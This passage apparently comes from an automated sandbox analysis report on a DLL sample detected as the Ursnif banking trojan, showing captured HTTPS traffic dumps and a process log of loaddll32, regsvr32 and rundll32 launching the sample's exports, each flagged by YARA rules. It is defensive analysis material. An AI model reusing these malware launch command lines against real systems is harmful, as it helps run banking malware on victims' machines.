                                                2021-09-10 09:28:24 UTC129INData Raw: c2 be 2c c7 86 75 7f c0 07 65 cd f1 6f 52 49 1c a2 bf 51 63 d6 b0 f2 13 c4 04 fe 20 01 07 cb d3 8e 99 64 11 b9 24 42 c8 1b b5 f4 bc 8f 51 38 d1 ac 71 b4 7e 50 14 3b 12 05 e4 33 81 16 dd c1 82 5b fe 6e 43 e1 69 7f 02 00 3c fb 4d d7 1d 1b 1c 78 9a 90 91 26 c0 01 32 7d e6 bb f6 61 83 43 ac 9e 29 a5 d3 1a db 1e a1 c8 2e 5b a9 2a 4f 2b 93 c3 32 a1 89 5a 32 7c 52 5b f0 28 00 85 bf 5b c1 03 09 8c c4 c9 e6 9a 42 7b 33 2f 41 9a 89 e6 94 11 49 3a 2d 50 24 ed b4 00 63 22 e9 a4 dd 2c 12 eb 5d e5 9b 8a 00 3a 04 54 cd 78 29 09 91 5f 55 0a dc 12 5d 57 8a d4 9b 3f 51 1b b1 da 69 a3 21 00 3c af b5 16 8b 39 cd 54 91 ee e1 f5 01 55 8f c1 6e b2 b8 ce b9 cf 6c 63 b9 11 6d 79 6f 09 45 2d 91 db 12 64 7e 58 31 e5 71 1b eb 5a 46 68 94 9b 33 3f 8c 8f b5 00 ee c0 63 6d ea 50 92 a5
                                                Data Ascii: ,ueoRIQc d$BQ8q~P;3[nCi<Mx&2}aC).[*O+2Z2|R[([B{3/AI:-P$c",]:Tx)_U]W?Qi!<9TUnlcmyoE-d~X1qZFh3?cmP
                                                2021-09-10 09:28:24 UTC130INData Raw: c5 db a9 d3 49 21 03 b3 0e 40 1f 22 32 db c7 58 83 37 36 41 3c e3 4b 1c 88 7c 48 d0 94 be 0f 98 90 0d 72 30 c1 0c 31 1d 4e aa 45 34 7c 18 8f 20 0c 80 22 ed 57 2c 48 6b e9 67 61 50 4e 26 9b c5 0b b6 48 1c df 23 d1 c9 0c 07 c0 e3 06 50 a6 19 52 c8 60 56 c5 af 63 ce 48 8c 23 a8 a5 d8 5f 91 54 8c 2c 52 1d b8 35 83 c2 2e 93 c0 a8 a1 5f 9a 50 1c 7b 70 c3 a7 d4 b9 59 d1 49 a9 24 b0 0b 3f 61 f7 70 b7 82 ea 61 5f 10 f0 19 c7 51 9a 97 20 6e 90 e9 c6 e7 40 0d ee 0a 6e c0 c8 da 47 0a 44 fa 62 62 96 02 a3 93 24 5d 48 c7 3f 48 4f a5 5d 2c 92 b1 1c c6 1d 9d af e1 8e fa 47 8c 2c 6d b0 ab 7a f7 1e be b9 28 11 6a 54 44 24 60 cc 16 42 16 af d9 58 40 9e 67 2d 5e b1 a8 53 ff 00 15 e5 41 30 71 27 ad 93 b8 11 82 38 f6 aa af 03 91 91 ac e8 ac d0 c4 9c b5 6d da a0 01 d0 2e 5a 78
                                                Data Ascii: I!@"2X76A<K|Hr01NE4| "W,HkgaPN&H#PR`VcH#_T,R5._P{pYI$?apa_Q n@nGDbb$]H?HO],G,mz(jTD$`BX@g-^SA0q'8m.Zx
                                                2021-09-10 09:28:24 UTC132INData Raw: ba bd ca 3a 1b cf 05 6b 96 b2 4e 37 07 a1 6b bc 17 7c 13 ed c0 41 6e 4d f2 c3 db dc e0 67 12 a9 da a6 c2 8f 68 ea 70 02 aa 6a 44 a5 dc 39 ea 3b 75 cb 24 71 c9 24 e0 54 1c 80 0d d1 f8 e0 65 0d 49 dc 57 7c 61 6d b4 6d be ad c7 4f 4c 7d aa 38 fc 3b 89 e8 68 d6 1d d5 4a 0f 37 d8 9f 75 8c 69 e7 a2 0d 50 8c 11 54 49 f5 1e 83 1e 48 d7 8e b4 87 6e 79 45 d0 a2 bb 49 3c 8b 5e 72 45 42 57 c9 da ff 00 56 e0 49 c2 0d f2 47 51 81 e0 9f 41 e1 e9 a7 68 84 8a 92 f2 43 77 da 4d e3 de 8b 46 91 fd 29 ab 11 08 d0 c8 63 55 e5 b8 de cb 8b 2c 80 70 ef eb ec eb 59 f4 57 d1 ba 39 dc 23 24 05 f7 10 de ac 46 19 f4 da 8d 5a c5 a9 78 a2 d8 62 53 dc 59 6c 96 4d 31 e3 52 24 6d ed 1b f6 90 90 00 00 f4 39 c9 5b 07 f5 0e 6f 19 26 20 06 92 27 28 c7 df b6 b7 7c 72 67 5f ca db 3f 7a 5b c0 48
                                                Data Ascii: :kN7k|AnMghpjD9;u$q$TeIW|ammOL}8;hJ7uiPTIHnyEI<^rEBWVIGQAhCwMF)cU,pYW9#$FZxbSYlM1R$m9[o& '(|rg_?z[H
                                                2021-09-10 09:28:24 UTC133INData Raw: 5e 0b 08 67 d4 a5 ef d9 ed e8 e0 66 9d 5e 69 36 99 df 71 11 0b e2 82 11 c6 2e ac 92 c6 49 25 21 4f fb a5 1c 2e 1f 1a 67 8a e0 31 9d eb b5 c3 1c 30 c2 b2 49 bb 67 91 9b 7b 12 77 3e 19 9d 24 03 67 a6 e0 00 af 96 26 8e 72 7e cc ca a4 44 e3 ba 6e ec e0 e2 b9 23 7a 90 4d 1a f4 6e 87 27 97 53 34 81 4a b3 7d 9a 2d 12 4f 38 51 87 55 3d 46 16 88 1a ba ea 4f 6c aa 60 c9 d6 c8 f4 c6 06 f8 be 78 39 4e a4 b8 3f 10 30 0f a5 be 8b 5f b4 7e fa 8d 37 70 de a5 72 a1 d4 49 53 47 d9 1c fe 25 f5 56 c4 8f 5f f5 b5 95 35 4d d6 34 ff 00 56 7b 1c 06 69 a5 04 59 fb 53 43 9f f6 46 15 04 5f 23 e1 7c e2 0e 6c 9b da 08 cf 27 de 1c 8a bf 51 94 ad c8 66 37 4f 90 b9 75 e8 7c bc fa 77 c4 51 03 06 32 19 11 55 58 74 ea 46 26 96 72 47 db 97 b3 2b b7 7f 1b f0 92 7b 35 28 c0 34 41 d7 c6 60 43
                                                Data Ascii: ^gf^i6q.I%!O.g10Ig{w>$g&r~Dn#zMn'S4J}-O8QU=FOl`x9N?0_~7prISG%V_5M4V{iYSCF_#|l'Qf7Ou|wQ2UXtF&rG+{5(4A`C
                                                2021-09-10 09:28:24 UTC135INData Raw: f2 17 e1 85 9f 76 42 67 3c 33 4a be 2b 12 3b af 60 32 44 d5 74 93 80 a8 ca 3b 80 32 45 91 82 ee e7 8c 97 6a 1b 4a c0 1d 75 31 b3 3f 42 06 ee 70 32 37 2a c3 a1 07 f9 be ab f4 b6 9b 9d 2e ac 71 75 d1 1e bb 67 d5 3e 99 81 b6 bc 6f c2 cf 5d d7 35 50 40 48 1a fd 32 39 0b 13 9e 92 85 f4 6c 83 52 be 92 c4 bf d5 6b 21 7d 82 dd a2 76 4c d6 e9 8f a9 50 eb 90 29 3d a5 b8 cf fc 59 0c c3 d6 37 0d fd 30 e1 c5 71 e8 c0 1c d2 39 3d fc 30 a7 f6 c9 61 3f ea e4 39 ac 83 d1 5b a7 ed 59 a4 d6 44 c2 8a 4a 4f fd 58 c5 4b 5d c4 43 66 a5 0a f1 e6 43 94 57 8e 70 64 d1 e9 4b 5c b3 c8 3c 33 b7 f4 83 c9 c6 97 e8 fd 43 7f e5 27 3f 87 f4 9f e7 68 35 71 ff 00 f4 ba d4 fb f1 1e a0 1f 55 c4 02 78 9a 38 3e 91 2b be 0d 54 47 8a 7c 82 5f a2 35 0d bf 4f ac 79 97 64 68 dd 9f 22 46 d5 32 87 9c
                                                Data Ascii: vBg<3J+;`2Dt;2EjJu1?Bp27*.qug>o]5P@H29lRk!}vLP)=Y70q9=0a?9[YDJOXK]CfCWpdK\<3C'?h5qUx8>+TG|_5Oydh"F2


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                7           192.168.2.5  49818        151.101.1.44    443               C:\Program Files (x86)\Internet Explorer\iexplore.exe

                                                Timestamp                kBytes transferred  Direction  Data
                                                2021-09-10 09:28:24 UTC  65                  OUT        GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5f3d7819fc402dab11ff0cbe39c46367.jpg HTTP/1.1
                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC  92                  IN         HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 15107
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 434421233783553505689275387282581492423,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "09a6961e625e1651f3f490355f583dd3"
                                                last-modified: Wed, 25 Aug 2021 13:35:26 GMT
                                                status: 200 OK
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 100
                                                x-ratelimit-reset: 1
                                                x-request-id: b50551b2b2b1e46afdfab3b3f3ddd4e1
                                                x-envoy-upstream-service-time: 9
                                                X-backend-name: US_DIR:3FP7YNX3LMizprTZsG7BSW--F_US_nlb102
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 1366323
                                                X-Served-By: cache-wdc5561-WDC, cache-dca17753-DCA, cache-hhn4055-HHN
                                                X-Cache: HIT, HIT, HIT
                                                X-Cache-Hits: 1, 1, 2
                                                X-Timer: S1631266105.734142,VS0,VE0
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5f3d7819fc402dab11ff0cbe39c46367.jpg
                                                X-vcl-time-ms: 0


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Memory Usage

                                                High Level Behavior Distribution

                                                Behavior

                                                System Behavior

                                                General

                                                Start time: 11:28:11
                                                Start date: 10/09/2021
                                                Path: C:\Windows\System32\loaddll32.exe
                                                Wow64 process (32bit): true
                                                Commandline: loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll'
                                                Imagebase: 0xed0000
                                                File size: 116736 bytes
                                                MD5 hash: 542795ADF7CC08EFCF675D65310596E8
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                Reputation: high

                                                General

                                                Start time: 11:28:11
                                                Start date: 10/09/2021
                                                Path: C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit): true
                                                Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                                                Imagebase: 0x150000
                                                File size: 232960 bytes
                                                MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: high

                                                General

                                                Start time: 11:28:12
                                                Start date: 10/09/2021
                                                Path: C:\Windows\SysWOW64\regsvr32.exe
                                                Wow64 process (32bit): true
                                                Commandline: regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll
                                                Imagebase: 0x1100000
                                                File size: 20992 bytes
                                                MD5 hash: 426E7499F6A7346F0410DEAD0805586B
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                Reputation: high

                                                General

                                                Start time: 11:28:12
                                                Start date: 10/09/2021
                                                Path: C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit): true
                                                Commandline: rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                                                Imagebase: 0xef0000
                                                File size: 61952 bytes
                                                MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                Reputation:high

                                                General

                                                Start time:11:28:12
                                                Start date:10/09/2021
                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                Imagebase:0x7ff724010000
                                                File size:823560 bytes
                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:11:28:12
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, Author: Joe Security
                                                Reputation:high

                                                General

                                                Start time:11:28:13
                                                Start date:10/09/2021
                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17410 /prefetch:2
                                                Imagebase:0x1110000
                                                File size:822536 bytes
                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:11:28:16
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                Reputation:high

                                                General

                                                Start time:11:28:20
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:28:23
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:28:28
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:28:32
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:28:35
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:28:38
                                                Start date:10/09/2021
                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17428 /prefetch:2
                                                Imagebase:0x1110000
                                                File size:822536 bytes
                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                General

                                                Start time:11:28:38
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:28:42
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:28:45
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:28:49
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:28:50
                                                Start date:10/09/2021
                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82954 /prefetch:2
                                                Imagebase:0x1110000
                                                File size:822536 bytes
                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                General

                                                Start time:11:28:52
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, Author: Joe Security

                                                General

                                                Start time:11:28:54
                                                Start date:10/09/2021
                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17440 /prefetch:2
                                                Imagebase:0x1110000
                                                File size:822536 bytes
